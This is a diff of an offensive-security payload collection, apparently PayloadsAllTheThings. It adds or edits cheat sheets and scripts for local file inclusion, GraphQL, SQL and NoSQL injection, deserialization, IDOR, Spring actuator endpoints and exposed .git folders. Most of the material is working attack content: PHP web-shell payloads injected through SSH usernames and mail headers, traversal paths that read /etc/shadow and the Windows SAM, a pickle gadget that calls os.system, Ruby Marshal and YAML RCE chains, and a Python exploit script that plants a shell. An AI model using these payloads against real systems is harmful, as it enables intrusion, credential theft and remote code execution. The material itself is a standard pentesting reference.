 http://example.com/index.php?page=/var/log/vsftpd.log
 http://example.com/index.php?page=/var/log/sshd.log
 http://example.com/index.php?page=/var/log/mail
@@ -298,6 +291,49 @@ http://example.com/index.php?page=/usr/local/apache/log/error_log
 http://example.com/index.php?page=/usr/local/apache2/log/error_log
 ```
 ### RCE via SSH
 Try to ssh into the box with a PHP code as username `<?php system($_GET["cmd"]);?>`.
 ```powershell
 ssh <?php system($_GET["cmd"]);?>@10.10.10.10
 ```
 Then include the SSH log files inside the Web Application.
 ```powershell
 http://example.com/index.php?page=/var/log/auth.log&cmd=id
 ```
 ### RCE via Mail
 First send an email using the open SMTP then include the log file located at `http://example.com/index.php?page=/var/log/mail`.
 ```powershell
 root@kali:~# telnet 10.10.10.10. 25
 Trying 10.10.10.10....
 Connected to 10.10.10.10..
 Escape character is '^]'.
 220 straylight ESMTP Postfix (Debian/GNU)
 helo ok
 250 straylight
 mail from: mail@example.com
 250 2.1.0 Ok
 rcpt to: root
 250 2.1.5 Ok
 data
 354 End data with <CR><LF>.<CR><LF>
 subject: <?php echo system($_GET["cmd"]); ?>
 data2
 .
 ```
 In some cases you can also send the email with the `mail` command line.
 ```powershell
 mail -s "<?php system($_GET['cmd']);?>" www-data@10.10.10.10. < /dev/null
 ```
 ## LFI to RCE via PHP sessions
 Check if the website use PHP Session (PHPSESSID)
@@ -326,7 +362,32 @@ Use the LFI to include the PHP session file
 login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27
 ```
-## Thanks to
+## LFI to RCE via credentials files
 This method require high privileges inside the application in order to read the sensitive files.
 ### Windows version
 First extract `sam` and `system` files.
 ```powershell
 http://example.com/index.php?page=../../../../../../WINDOWS/repair/sam
 http://example.com/index.php?page=../../../../../../WINDOWS/repair/system
 ```
 Then extract hashes from these files `samdump2 SYSTEM SAM > hashes.txt`, and crack them with `hashcat/john` or replay them using the Pass The Hash technique.
 ### Linux version
 First extract `/etc/shadow` files.
 ```powershell
 http://example.com/index.php?page=../../../../../../etc/shadow
 ```
 Then crack the hashes inside in order to login via SSH on the machine.
 ## References
 * [OWASP LFI](https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion)
 * [HighOn.coffee LFI Cheat](https://highon.coffee/blog/lfi-cheat-sheet/)
@@ -341,3 +402,5 @@ login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/s
 * [New PHP Exploitation Technique - 14 Aug 2018 by Dr. Johannes Dahse](https://blog.ripstech.com/2018/new-php-exploitation-technique/)
 * [It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It, Sam Thomas](https://github.com/s-n-t/presentations/blob/master/us-18-Thomas-It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It.pdf)
 * [Local file inclusion mini list - Penetrate.io](https://penetrate.io/2014/09/25/local-file-inclusion-mini-list/)
 * [CVV #1: Local File Inclusion - @SI9INT - Jun 20, 2018](https://medium.com/bugbountywriteup/cvv-1-local-file-inclusion-ebc48e0e479a)
 * [Exploiting Remote File Inclusion (RFI) in PHP application and bypassing remote URL inclusion restriction](http://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html?m=1)
--- a/Inclusion/phpinfolfi.py
+++ b/Inclusion/phpinfolfi.py
@@ -1,5 +1,7 @@
 #!/usr/bin/python
 # https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf
 from __future__ import print_function
 from builtins import range
 import sys
 import threading
 import socket
@@ -83,7 +85,7 @@ class ThreadWorker(threading.Thread):
                if self.event.is_set():
                    break
                if x:
-                    print "\nGot it! Shell created in /tmp/g"
+                    print("\nGot it! Shell created in /tmp/g")
                    self.event.set()
            except socket.error:
@@ -110,23 +112,23 @@ def getOffset(host, port, phpinforeq):
    if i == -1:
        raise ValueError("No php tmp_name in phpinfo output")
-    print "found %s at %i" % (d[i:i+10],i)
+    print("found %s at %i" % (d[i:i+10],i))
    # padded up a bit
    return i+256
 def main():
-    print "LFI With PHPInfo()"
+    print("LFI With PHPInfo()")
-    print "-=" * 30
+    print("-=" * 30)
    if len(sys.argv) < 2:
-        print "Usage: %s host [port] [threads]" % sys.argv[0]
+        print("Usage: %s host [port] [threads]" % sys.argv[0])
        sys.exit(1)
    try:
        host = socket.gethostbyname(sys.argv[1])
-    except socket.error, e:
+    except socket.error as e:
-        print "Error with hostname %s: %s" % (sys.argv[1], e)
+        print("Error with hostname %s: %s" % (sys.argv[1], e))
        sys.exit(1)
    port=80
@@ -134,8 +136,8 @@ def main():
        port = int(sys.argv[2])
    except IndexError:
        pass
-    except ValueError, e:
+    except ValueError as e:
-        print "Error with port %d: %s" % (sys.argv[2], e)
+        print("Error with port %d: %s" % (sys.argv[2], e))
        sys.exit(1)
    poolsz=10
@@ -143,11 +145,11 @@ def main():
        poolsz = int(sys.argv[3])
    except IndexError:
        pass
-    except ValueError, e:
+    except ValueError as e:
-        print "Error with poolsz %d: %s" % (sys.argv[3], e)
+        print("Error with poolsz %d: %s" % (sys.argv[3], e))
        sys.exit(1)
-    print "Getting initial offset...",
+    print("Getting initial offset...", end=' ')
    reqphp, tag, reqlfi = setup(host, port)
    offset = getOffset(host, port, reqphp)
    sys.stdout.flush()
@@ -156,7 +158,7 @@ def main():
    e = threading.Event()
    l = threading.Lock()
-    print "Spawning worker pool (%d)..." % poolsz
+    print("Spawning worker pool (%d)..." % poolsz)
    sys.stdout.flush()
    tp = []
@@ -174,19 +176,19 @@ def main():
                sys.stdout.flush()
                if counter >= maxattempts:
                    break
-        print
+        print()
        if e.is_set():
-            print "Woot!  \m/"
+            print("Woot!  \m/")
        else:
-            print ":("
+            print(":(")
    except KeyboardInterrupt:
-        print "\nTelling threads to shutdown..."
+        print("\nTelling threads to shutdown...")
        e.set()
-    print "Shuttin' down..."
+    print("Shuttin' down...")
    for t in tp:
        t.join()
 if __name__=="__main__":
-    print "Don't forget to modify the LFI URL"
+    print("Don't forget to modify the LFI URL")
    main()
--- a/Inclusion/uploadlfi.py
+++ b/Inclusion/uploadlfi.py
@@ -1,3 +1,5 @@
 from __future__ import print_function
 from builtins import range
 import itertools
 import requests
 import string
--- a/Injection/Images/htb-help.png
+++ b/Injection/Images/htb-help.png
--- a/Injection/README.md
+++ b/Injection/README.md
@@ -0,0 +1,217 @@
 # GraphQL injection
 > GraphQL is a query language for APIs and a runtime for fulfilling those queries with existing data. A GraphQL service is created by defining types and fields on those types, then providing functions for each field on each type
 ## Summary
 * [Tools](#tools)
 * [Exploit](#exploit)
  * [Identify an injection point](#identify-an-injection-point)
  * [Enumerate Database Schema via Instropection](#enumerate-database-schema-via-introspection)
  * [Extract data](#extract-data)
  * [Enumerate the types' definition](#enumerate-the-type-definition)
  * [Use mutations](#use-mutations)
  * [NOSQL injection](#nosql-injection)
  * [SQL injection](#sql-injection)
 * [References](#references)
 ## Tools
 * [GraphQLmap - Scripting engine to interact with a graphql endpoint for pentesting purposes](https://github.com/swisskyrepo/GraphQLmap)
 * [GraphQL Security Toolkit - GraphQL Security Research Material](https://github.com/doyensec/graph-ql/)
 * [GraphQL IDE - An extensive IDE for exploring GraphQL API's](https://github.com/andev-software/graphql-ide)
 ## Exploit
 ### Identify an injection point
 Most of the time the graphql is located on the `/graphql` or `/graphiql` endpoint.
 ```js
 example.com/graphql?query={__schema{types{name}}}
 example.com/graphiql?query={__schema{types{name}}}
 ```
 Check if errors are visible.
 ```javascript
 ?query={__schema}
 ?query={}
 ?query={thisdefinitelydoesnotexist}
 ```
 ### Enumerate Database Schema via Introspection
 URL encoded query to dump the database schema.
 ```js
 fragment+FullType+on+__Type+{++kind++name++description++fields(includeDeprecated%3a+true)+{++++name++++description++++args+{++++++...InputValue++++}++++type+{++++++...TypeRef++++}++++isDeprecated++++deprecationReason++}++inputFields+{++++...InputValue++}++interfaces+{++++...TypeRef++}++enumValues(includeDeprecated%3a+true)+{++++name++++description++++isDeprecated++++deprecationReason++}++possibleTypes+{++++...TypeRef++}}fragment+InputValue+on+__InputValue+{++name++description++type+{++++...TypeRef++}++defaultValue}fragment+TypeRef+on+__Type+{++kind++name++ofType+{++++kind++++name++++ofType+{++++++kind++++++name++++++ofType+{++++++++kind++++++++name++++++++ofType+{++++++++++kind++++++++++name++++++++++ofType+{++++++++++++kind++++++++++++name++++++++++++ofType+{++++++++++++++kind++++++++++++++name++++++++++++++ofType+{++++++++++++++++kind++++++++++++++++name++++++++++++++}++++++++++++}++++++++++}++++++++}++++++}++++}++}}query+IntrospectionQuery+{++__schema+{++++queryType+{++++++name++++}++++mutationType+{++++++name++++}++++types+{++++++...FullType++++}++++directives+{++++++name++++++description++++++locations++++++args+{++++++++...InputValue++++++}++++}++}}
 ```
 URL decoded query to dump the database schema.
 ```javascript
 fragment FullType on __Type {
  kind
  name
  description
  fields(includeDeprecated: true) {
    name
    description
    args {
      ...InputValue
    }
    type {
      ...TypeRef
    }
    isDeprecated
    deprecationReason
  }
  inputFields {
    ...InputValue
  }
  interfaces {
    ...TypeRef
  }
  enumValues(includeDeprecated: true) {
    name
    description
    isDeprecated
    deprecationReason
  }
  possibleTypes {
    ...TypeRef
  }
 }
 fragment InputValue on __InputValue {
  name
  description
  type {
    ...TypeRef
  }
  defaultValue
 }
 fragment TypeRef on __Type {
  kind
  name
  ofType {
    kind
    name
    ofType {
      kind
      name
      ofType {
        kind
        name
        ofType {
          kind
          name
          ofType {
            kind
            name
            ofType {
              kind
              name
              ofType {
                kind
                name
              }
            }
          }
        }
      }
    }
  }
 }
 query IntrospectionQuery {
  __schema {
    queryType {
      name
    }
    mutationType {
      name
    }
    types {
      ...FullType
    }
    directives {
      name
      description
      locations
      args {
        ...InputValue
      }
    }
  }
 }
 ```
 ### Extract data
 ```js
 example.com/graphql?query={TYPE_1{FIELD_1,FIELD_2}}
 ```
 ![HTB Help - GraphQL injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/GraphQL%20Injection/Images/htb-help.png?raw=true)
 ### Enumerate the types' definition 
 Enumerate the definition of interesting types using the following GraphQL query, replacing "User" with the chosen type
 ```javascript
 {__type (name: "User") {name fields{name type{name kind ofType{name kind}}}}}
 ```
 ### Use mutations
 Mutations work like function, you can use them to interact with the GraphQL.
 ```javascript
 # mutation{signIn(login:"Admin", password:"secretp@ssw0rd"){token}}
 # mutation{addUser(id:"1", name:"Dan Abramov", email:"dan@dan.com") {id name email}}
 ```
 ### NOSQL injection
 Use `$regex`, `$ne` from []() inside a `search` parameter.
 ```json
 {
  doctors(
    options: "{\"limit\": 1, \"patients.ssn\" :1}", 
    search: "{ \"patients.ssn\": { \"$regex\": \".*\"}, \"lastName\":\"Admin\" }")
    {
      firstName lastName id patients{ssn}
    }
 }
 ```
 ### SQL injection
 Simple SQL injection inside a graphql field.
 ```powershell
 curl -X POST http://localhost:8080/graphql\?embedded_submission_form_uuid\=1%27%3BSELECT%201%3BSELECT%20pg_sleep\(30\)%3B--%27
 ```
 ## References
 * [Introduction to GraphQL](https://graphql.org/learn/)
 * [GraphQL Introspection](https://graphql.org/learn/introspection/)
 * [API Hacking GraphQL - @ghostlulz - jun 8, 2019](https://medium.com/@ghostlulzhacks/api-hacking-graphql-7b2866ba1cf2)
 * [GraphQL abuse: Bypass account level permissions through parameter smuggling - March 14, 2018 - @Detectify](https://labs.detectify.com/2018/03/14/graphql-abuse/)
 * [Discovering GraphQL endpoints and SQLi vulnerabilities - Sep 23, 2018 - Matías Choren](https://medium.com/@localh0t/discovering-graphql-endpoints-and-sqli-vulnerabilities-5d39f26cea2e)
 * [Securing Your GraphQL API from Malicious Queries - Feb 21, 2018 - Max Stoiber](https://blog.apollographql.com/securing-your-graphql-api-from-malicious-queries-16130a324a6b)
 * [GraphQL NoSQL Injection Through JSON Types - June 12, 2017 - Pete Corey](http://www.petecorey.com/blog/2017/06/12/graphql-nosql-injection-through-json-types/)
 * [SQL injection in GraphQL endpoint through embedded_submission_form_uuid parameter - Nov 6th 2018 - @jobert](https://hackerone.com/reports/435066)
 * [Looting GraphQL Endpoints for Fun and Profit - @theRaz0r](https://raz0r.name/articles/looting-graphql-endpoints-for-fun-and-profit/)
 * [How to set up a GraphQL Server using Node.js, Express & MongoDB - 5 NOVEMBER 2018 - Leonardo Maldonado](https://www.freecodecamp.org/news/how-to-set-up-a-graphql-server-using-node-js-express-mongodb-52421b73f474/)
 * [GraphQL cheatsheet - DEVHINTS.IO](https://devhints.io/graphql)
 * [HIP19 Writeup - Meet Your Doctor 1,2,3 - June 22, 2019 - Swissky](https://swisskyrepo.github.io/HIP19-MeetYourDoctor/)
--- a/Deserialization/Files/PHP-Serialization-RCE-Exploit.php
+++ b/Deserialization/Files/PHP-Serialization-RCE-Exploit.php
--- a/Deserialization/Files/Ruby_universal_gadget_generate_verify.rb
+++ b/Deserialization/Files/Ruby_universal_gadget_generate_verify.rb
--- a/Deserialization/Java.md
+++ b/Deserialization/Java.md
@@ -63,7 +63,7 @@ JRE8u20_RCE_Gadget
 JexBoss - JBoss (and others Java Deserialization Vulnerabilities) verify and EXploitation Tool, [https://github.com/joaomatosf/jexboss](https://github.com/joaomatosf/jexboss)
-## Thanks to
+## References
 - [Github - ysoserial](https://github.com/frohoff/ysoserial)
 - [Java-Deserialization-Cheat-Sheet - GrrrDog](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md)
--- a/Deserialization/PHP.md
+++ b/Deserialization/PHP.md
@@ -1,10 +1,16 @@
-# PHP Object Injection
+# PHP Object injection
 PHP Object Injection is an application level vulnerability that could allow an attacker to perform different kinds of malicious attacks, such as Code Injection, SQL Injection, Path Traversal and Application Denial of Service, depending on the context. The vulnerability occurs when user-supplied input is not properly sanitized before being passed to the unserialize() PHP function. Since PHP allows object serialization, attackers could pass ad-hoc serialized strings to a vulnerable unserialize() call, resulting in an arbitrary PHP object(s) injection into the application scope.
-Also you should check the `Wrapper Phar://` in [File Inclusion - Path Traversal](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal#wrapper-phar) which use a PHP object injection.
+The following magic methods will help you for a PHP Object injection
-## Exploit with the __wakeup in the unserialize function
+* __wakeup() when an object is unserialized.
 * __destruct() when an object is deleted.
 * __toString() when an object is converted to a string.
 Also you should check the `Wrapper Phar://` in [File Inclusion](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion#wrapper-phar) which use a PHP object injection.
 ## __wakeup in the unserialize function
 Vulnerable code:
@@ -40,7 +46,6 @@ a:2:{i:0;s:4:"XVWA";i:1;s:33:"Xtreme Vulnerable Web Application";}
 # Command execution
 string(68) "O:18:"PHPObjectInjection":1:{s:6:"inject";s:17:"system('whoami');";}"
 ```
 ## Authentication bypass
@@ -62,11 +67,11 @@ if ($data['username'] == $adminName && $data['password'] == $adminPassword) {
 Payload:
-```
+```php
 a:2:{s:8:"username";b:1;s:8:"password";b:1;}
 ```
-Because `true == "str"` is true. Ref: [POC2009 Shocking News in PHP Exploitation](https://www.owasp.org/images/f/f6/POC2009-ShockingNewsInPHPExploitation.pdf)
+Because `true == "str"` is true.
 ### Object reference
@@ -93,14 +98,9 @@ if($obj) {
 Payload:
 ```php
 O:6:"Object":2:{s:10:"secretCode";N;s:4:"guess";R:2;}
 ```
 O:6:"Object":2:{s:10:"secretCode";N;s:4:"code";R:2;}
 ```
 Ref: 
 - [PHP Internals Book - Serialization](http://www.phpinternalsbook.com/classes_objects/serialization.html)
 - [TSULOTT Web challenge write-up from MeePwn CTF 1st 2017 by Rawsec](https://rawsec.ml/en/MeePwn-2017-write-ups/#tsulott-web)
 ## Others exploits
@@ -146,9 +146,20 @@ echo urlencode(serialize(new PHPObjectInjection));
 phpggc monolog/rce1 'phpinfo();' -s
 ```
-## Thanks to
+## Real world examples
- [PHP Object Injection - OWASP](https://www.owasp.org/index.php/PHP_Object_Injection)
+* [Vanilla Forums ImportController index file_exists Unserialize Remote Code Execution Vulnerability - Steven Seeley](https://hackerone.com/reports/410237)
- [PHP Object Injection - Thin Ba Shane](http://location-href.com/php-object-injection/)
+* [Vanilla Forums Xenforo password splitHash Unserialize Remote Code Execution Vulnerability - Steven Seeley](https://hackerone.com/reports/410212)
- [PHP unserialize](http://php.net/manual/en/function.unserialize.php)
+* [Vanilla Forums domGetImages getimagesize Unserialize Remote Code Execution Vulnerability (critical) - Steven Seeley](https://hackerone.com/reports/410882)
- [PHP Generic Gadget - ambionics security](https://www.ambionics.io/blog/php-generic-gadget-chains)
+* [Vanilla Forums Gdn_Format unserialize() Remote Code Execution Vulnerability - Steven Seeley](https://hackerone.com/reports/407552)
 ## References
 * [PHP Object Injection - OWASP](https://www.owasp.org/index.php/PHP_Object_Injection)
 * [PHP Object Injection - Thin Ba Shane](http://location-href.com/php-object-injection/)
 * [PHP unserialize](http://php.net/manual/en/function.unserialize.php)
 * [PHP Generic Gadget - ambionics security](https://www.ambionics.io/blog/php-generic-gadget-chains)
 * [POC2009 Shocking News in PHP Exploitation](https://www.owasp.org/images/f/f6/POC2009-ShockingNewsInPHPExploitation.pdf)
 * [PHP Internals Book - Serialization](http://www.phpinternalsbook.com/classes_objects/serialization.html)
 * [TSULOTT Web challenge write-up from MeePwn CTF 1st 2017 by Rawsec](https://rawsec.ml/en/MeePwn-2017-write-ups/#tsulott-web)
 * [CTF writeup: PHP object injection in kaspersky CTF](https://medium.com/@jaimin_gohel/ctf-writeup-php-object-injection-in-kaspersky-ctf-28a68805610d)
--- a/Deserialization/Python.md
+++ b/Deserialization/Python.md
@@ -0,0 +1,50 @@
 # Python Deserialization
 ## Pickle
 The following code is a simple example of using `cPickle` in order to generate an auth_token which is a serialized User object.
 ```python
 import cPickle
 from base64 import b64encode, b64decode
 class User:
    def __init__(self):
        self.username = "anonymous"
        self.password = "anonymous"
        self.rank     = "guest"
 h = User()
 auth_token = b64encode(cPickle.dumps(h))
 print("Your Auth Token : {}").format(auth_token)
 ```
 The vulnerability is introduced when a token is loaded from an user input. 
 ```python
 new_token = raw_input("New Auth Token : ")
 token = cPickle.loads(b64decode(new_token))
 print "Welcome {}".format(token.username)
 ```
 Python 2.7 documentation clearly states Pickle should never be used with untrusted sources. Let's create a malicious data that will execute arbitrary code on the server.
 > The pickle module is not secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source.
 ```python
 import cPickle
 from base64 import b64encode, b64decode
 class Evil(object):
    def __reduce__(self):
        return (os.system,("whoami",))
 e = Evil()
 evil_token = b64encode(cPickle.dumps(e))
 print("Your Evil Token : {}").format(evil_token)
 ```
 ## References
 * [Exploiting misuse of Python's "pickle" - Mar 20, 2011](https://blog.nelhage.com/2011/03/exploiting-pickle/)
 * [Python Pickle Injection - Apr 30, 2017](http://xhyumiracle.com/python-pickle-injection/)
--- a/Deserialization/README.md
+++ b/Deserialization/README.md
@@ -7,8 +7,9 @@ Check the following sub-sections, located in other files :
 * [Java deserialization : ysoserial, ...](Java.md)
 * [PHP (Object injection) : phpggc, ...](PHP.md)
 * [Ruby : universal rce gadget, ...](Ruby.md)
 * [Python : pickle, ...](Python.md)
-## Thanks to
+## References
 * [Github - ysoserial](https://github.com/frohoff/ysoserial)
 * [Java-Deserialization-Cheat-Sheet - GrrrDog](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md)
@@ -20,3 +21,7 @@ Check the following sub-sections, located in other files :
 * [PHP unserialize](http://php.net/manual/en/function.unserialize.php)
 * [PHP Generic Gadget - ambionics security](https://www.ambionics.io/blog/php-generic-gadget-chains)
 * [RUBY 2.X UNIVERSAL RCE DESERIALIZATION GADGET CHAIN - elttam, Luke Jahnke](https://www.elttam.com.au/blog/ruby-deserialization/)
 * [Java Deserialization in manager.paypal.com](http://artsploit.blogspot.hk/2016/01/paypal-rce.html) by Michael Stepankin
 * [Instagram's Million Dollar Bug](http://www.exfiltrated.com/research-Instagram-RCE.php) by Wesley Wineberg 
 * [(Ruby Cookie Deserialization RCE on facebooksearch.algolia.com](https://hackerone.com/reports/134321) by Michiel Prins (michiel)
 * [Java deserialization](https://seanmelia.wordpress.com/2016/07/22/exploiting-java-deserialization-via-jboss/) by meals
--- a/Deserialization/Ruby.md
+++ b/Deserialization/Ruby.md
@@ -1,12 +1,37 @@
 # Ruby Deserialization
 ## Marshal.load
 Script to generate and verify the deserialization gadget chain against Ruby 2.0 through to 2.5
 ```ruby
 for i in {0..5}; do docker run -it ruby:2.${i} ruby -e 'Marshal.load(["0408553a1547656d3a3a526571756972656d656e745b066f3a1847656d3a3a446570656e64656e63794c697374073a0b4073706563735b076f3a1e47656d3a3a536f757263653a3a537065636966696346696c65063a0a40737065636f3a1b47656d3a3a5374756253706563696669636174696f6e083a11406c6f616465645f66726f6d49220d7c696420313e2632063a0645543a0a4064617461303b09306f3b08003a1140646576656c6f706d656e7446"].pack("H*")) rescue nil'; done
 ```
-## Thanks
+## Yaml.load
 Vulnerable code
 ```ruby
 require "yaml"
 YAML.load(File.read("p.yml"))
 ```
 Exploitation code
 ```ruby
 --- !ruby/object:Gem::Requirement
 requirements:
  !ruby/object:Gem::DependencyList
  specs:
  - !ruby/object:Gem::Source::SpecificFile
    spec: &1 !ruby/object:Gem::StubSpecification
      loaded_from: "|id 1>&2"
  - !ruby/object:Gem::Source::SpecificFile
      spec:
 ```
 ## References
 - [RUBY 2.X UNIVERSAL RCE DESERIALIZATION GADGET CHAIN - elttam, Luke Jahnke](https://www.elttam.com.au/blog/ruby-deserialization/)
 - [Universal RCE with Ruby YAML.load - @_staaldraad ](https://staaldraad.github.io/post/2019-03-02-universal-rce-ruby-yaml-load/)
 - [Online access to Ruby 2.x Universal RCE Deserialization Gadget Chain - PentesterLab](https://pentesterlab.com/exercises/ruby_ugadget/online)
--- a/References/Images/idor.png
+++ b/References/Images/idor.png
--- a/References/README.md
+++ b/References/README.md
@@ -0,0 +1,59 @@
 # Insecure Direct Object References
 > Insecure Direct Object References occur when an application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and access resources in the system directly, for example database records or files.  - OWASP
 ## Summary
 * [Tools](#tools)
 * [Exploit](#exploit)
 * [Examples](#examples)
 * [References](#references)
 ## Tools
 - Burp Suite plugin Authz
 - Burp Suite plugin AuthMatrix
 - Burp Suite plugin Authorize
 ## Exploit
 ![https://lh5.googleusercontent.com/VmLyyGH7dGxUOl60h97Lr57F7dcnDD8DmUMCZTD28BKivVI51BLPIqL0RmcxMPsmgXgvAqY8WcQ-Jyv5FhRiCBueX9Wj0HSCBhE-_SvrDdA6_wvDmtMSizlRsHNvTJHuy36LG47lstLpTqLK](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Insecure%20Direct%20Object%20References/Images/idor.png)
 The value of a parameter is used directly to retrieve a database record.
 ```powershell
 http://foo.bar/somepage?invoice=12345
 ```
 The value of a parameter is used directly to perform an operation in the system
 ```powershell
 http://foo.bar/changepassword?user=someuser
 ```
 The value of a parameter is used directly to retrieve a file system resource
 ```powershell
 http://foo.bar/showImage?img=img00011
 ```
 The value of a parameter is used directly to access application functionality
 ```powershell
 http://foo.bar/accessPage?menuitem=12
 ```
 ## Examples
 * [HackerOne - IDOR to view User Order Information - meals](https://hackerone.com/reports/287789)
 * [HackerOne - IDOR on HackerOne Feedback Review - japz](https://hackerone.com/reports/262661)
 ## References
 * [OWASP - Testing for Insecure Direct Object References (OTG-AUTHZ-004)](https://www.owasp.org/index.php/Testing_for_Insecure_Direct_Object_References_(OTG-AUTHZ-004))
 * [OWASP - Insecure Direct Object Reference Prevention Cheat Sheet](https://www.owasp.org/index.php/Insecure_Direct_Object_Reference_Prevention_Cheat_Sheet)
 * [BUGCROWD - How-To: Find IDOR (Insecure Direct Object Reference) Vulnerabilities for large bounty rewards - Sam Houton](https://www.bugcrowd.com/how-to-find-idor-insecure-direct-object-reference-vulnerabilities-for-large-bounty-rewards/)
 * [IDOR tweet as any user](http://kedrisec.com/twitter-publish-by-any-user/) by kedrisec
 * [Manipulation of ETH balance](https://www.vicompany.nl/magazine/from-christmas-present-in-the-blockchain-to-massive-bug-bounty)
 * [Viewing private Airbnb Messages](http://buer.haus/2017/03/31/airbnb-web-to-app-phone-notification-idor-to-view-everyones-airbnb-messages/) 
 * [Hunting Insecure Direct Object Reference Vulnerabilities for Fun and Profit (PART-1) - Mohammed Abdul Raheem - Feb 2, 2018](https://codeburst.io/hunting-insecure-direct-object-reference-vulnerabilities-for-fun-and-profit-part-1-f338c6a52782)
--- a/Interface/Intruder/springboot_actuator.txt
+++ b/Interface/Intruder/springboot_actuator.txt
@@ -0,0 +1,52 @@
 auditevents
 autoconfig
 beans
 caches
 conditions
 configprops
 dump
 env
 flyway
 health
 heapdump
 httptrace
 info
 integrationgraph
 jolokia
 logfile
 loggers
 liquibase
 metrics
 mappings
 prometheus
 scheduledtasks
 sessions
 shutdown
 threaddump
 trace
 actuator/auditevents
 actuator/autoconfig
 actuator/beans
 actuator/caches
 actuator/conditions
 actuator/configprops
 actuator/dump
 actuator/env
 actuator/flyway
 actuator/health
 actuator/heapdump
 actuator/httptrace
 actuator/info
 actuator/integrationgraph
 actuator/jolokia
 actuator/logfile
 actuator/loggers
 actuator/liquibase
 actuator/metrics
 actuator/mappings
 actuator/prometheus
 actuator/scheduledtasks
 actuator/sessions
 actuator/shutdown
 actuator/threaddump
 actuator/trace
--- a/Interface/README.md
+++ b/Interface/README.md
@@ -0,0 +1,19 @@
 # Insecure management interface
 ## Springboot-Actuator
 Actuator endpoints let you monitor and interact with your application. 
 Spring Boot includes a number of built-in endpoints and lets you add your own. 
 For example, the health endpoint provides basic application health information. 
 Some of them contains sensitive info such as :
 - `/trace` (by default the last 100 HTTP requests with headers)
 - `/env` (the current environment properties)
 - `/heapdump` (builds and returns a heap dump from the JVM used by our application). 
 These endpoints are enabled by default in Springboot 1.X. Since Springboot 2.x only `/health` and `/info` are enabled by default.
 ## References
 * [Springboot - Official Documentation](https://docs.spring.io/spring-boot/docs/current/reference/html/production-ready-endpoints.html)
--- a/Management/README.md
+++ b/Management/README.md
@@ -0,0 +1,255 @@
 # Insecure source code management
 - [GIT - Source code management](#git---source-code-management)
  - [Github example with a .git](#github-example-with-a-git)
  - [Recovering the content of .git/index](#recovering-the-content-of-gitindex)
  - [Automatic way : diggit.py](#automatic-way--diggitpy)
  - [Automatic way : GoGitDumper](#automatic-way-gogitdumper)
  - [Automatic way : rip-git](#automatic-way--rip-git)
  - [Automatic way : GitHack](#automatic-way--githack)
  - [Harvesting secrets : trufflehog](#harvesting-secrets--trufflehog)
  - [Harvesting secrets : Gitrob](#harvesting-secrets--gitrob)
  - [Harvesting secrets : Gitleaks](#harvesting-secrets--gitleaks)
 - [SVN - Source code management](#svn---source-code-management)
  - [SVN example (Wordpress)](#svn-example-wordpress)
  - [Automatic way : svn-extractor](#automatic-way--svn-extractor)
 - [BAZAAR - Source code management](#bazaar---source-code-management)
  - [Automatic way : rip-bzr](#automatic-way--rip-bzr)
  - [Automatic way : bzr_dumper](#automatic-way--bzr_dumper)
 - [Leaked API keys](#leaked-api-keys)
 ## GIT - Source code management
 The following examples will create either a copy of the .git or a copy of the current commit.
 Check for the following files, if they exist you can extract the .git folder.
 - .git/config
 - .git/HEAD
 - .git/logs/HEAD
 ### Github example with a .git
 1. Check 403 error (Forbidden) for .git or even better : a directory listing
 2. Git saves all informations in log file .git/logs/HEAD (try 'head' in lowercase too)
    ```powershell
    0000000000000000000000000000000000000000 15ca375e54f056a576905b41a417b413c57df6eb root <root@dfc2eabdf236.(none)> 1455532500 +0000        clone: from https://github.com/fermayo/hello-world-lamp.git
    15ca375e54f056a576905b41a417b413c57df6eb 26e35470d38c4d6815bc4426a862d5399f04865c Michael <michael@easyctf.com> 1489390329 +0000        commit: Initial.
    26e35470d38c4d6815bc4426a862d5399f04865c 6b4131bb3b84e9446218359414d636bda782d097 Michael <michael@easyctf.com> 1489390330 +0000        commit: Whoops! Remove flag.
    6b4131bb3b84e9446218359414d636bda782d097 a48ee6d6ca840b9130fbaa73bbf55e9e730e4cfd Michael <michael@easyctf.com> 1489390332 +0000        commit: Prevent directory listing.
    ```
 3. Access to the commit based on the hash -> a directory name (first two signs from hash) and filename (rest of it).git/objects/26/e35470d38c4d6815bc4426a862d5399f04865c,
    ```powershell
    # create a .git directory
    git init test
    cd test/.git
    # download the file
    wget http://xxx.web.xxx.com/.git/objects/26/e35470d38c4d6815bc4426a862d5399f04865c
    mkdir .git/object/26
    mv e35470d38c4d6815bc4426a862d5399f04865c .git/objects/26/
    # display the content of the file
    git cat-file -p 26e35470d38c4d6815bc4426a862d5399f04865c
        tree 323240a3983045cdc0dec2e88c1358e7998f2e39
        parent 15ca375e54f056a576905b41a417b413c57df6eb
        author Michael <michael@easyctf.com> 1489390329 +0000
        committer Michael <michael@easyctf.com> 1489390329 +0000
        Initial.
    ```
 4. Access the tree 323240a3983045cdc0dec2e88c1358e7998f2e39
    ```powershell
    wget http://xxx.web.xxx.com/.git/objects/32/3240a3983045cdc0dec2e88c1358e7998f2e39
    mkdir .git/object/32
    mv 3240a3983045cdc0dec2e88c1358e7998f2e39 .git/objects/32/
    git cat-file -p 323240a3983045cdc0dec2e88c1358e7998f2e39
        040000 tree bd083286051cd869ee6485a3046b9935fbd127c0        css
        100644 blob cb6139863967a752f3402b3975e97a84d152fd8f        flag.txt
        040000 tree 14032aabd85b43a058cfc7025dd4fa9dd325ea97        fonts
        100644 blob a7f8a24096d81887483b5f0fa21251a7eefd0db1        index.html
        040000 tree 5df8b56e2ffd07b050d6b6913c72aec44c8f39d8        js
    ```
 5. Read the data (flag.txt)
